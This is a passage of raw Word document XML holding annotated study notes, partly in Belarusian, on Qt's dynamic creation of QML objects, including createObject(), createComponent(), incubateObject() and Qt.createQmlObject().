          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Таксама адсюль бачна, што у </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файле бачны </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> кмл аб’екта, які імпартуе гэты файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA6">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Notice in both instances,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:anchor="createObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>createObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is called with</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appWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>passed as the parent argument, since the dynamically created object is a visual (Qt Quick) object. The created object will become a child of the</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appWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object in</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main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and appear in the scene.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA6">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250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>When using files with relative paths, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path should be relative to the file where</w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:anchor="createComponent-method" w:history="1">
        <w:r w:rsidRPr="00250096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createComponent()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA6">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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To connect signals to (or receive signals from) dynamically created objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, use the signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method. See</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:anchor="connecting-signals-to-methods-and-signals" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connecting Signals to Methods and Signals</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00250096" w:rsidRDefault="00350EA6" w:rsidP="00350EA6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is also possible to instantiate components without blocking via the</w:t>
      </w:r>
      <w:r w:rsidR="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:anchor="incubateObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>incubateObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function. </w:t>
      </w:r>
      <w:r w:rsidR="00250096" w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu</w:t>
      </w:r>
      <w:r w:rsidR="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00250096">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc483000555"/>
      <w:bookmarkStart w:id="134" w:name="_Toc483003576"/>
      <w:bookmarkStart w:id="135" w:name="_Toc483603912"/>
      <w:bookmarkStart w:id="136" w:name="_Toc483605132"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating an Object from a String of QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA6">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If the QML is not defined until runtime, you can create a QML object from a string of QML using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:anchor="createQmlObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.createQmlObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function, as in the following example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> newObject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createQmlObject</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'import QtQuick 2.0; Rectangle {color: "red"; width: 20; height: 20}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA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parentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00350EA6">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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"dynamicSnippet1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="00350EA6" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The first argument</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the string of QML to create. Just like in a new file, you will need to import any types you wish to use. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The second argument</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the parent object for the new object, and the parent argument semantics which apply to components are similarly applicable for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>createQmlObject()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The third argument is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file path to associate with the new object; this is used for error reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="005C69B6" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the string of QML imports files using relative paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the path should be relative to the file in which the parent object (the second argument to the method) is defined.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00350EA6" w:rsidRPr="00D815C8" w:rsidRDefault="005C69B6" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When building static QML applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is enforced on platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, QML files are scanned to detect import dependencies. That way, all necessary plugins and resources are resolved at compile time. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only explicit import statements are considered</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (those found at the top of a QML file), and not import statements enclosed within string literals. To support static builds, you therefore need to ensure that QML files using</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
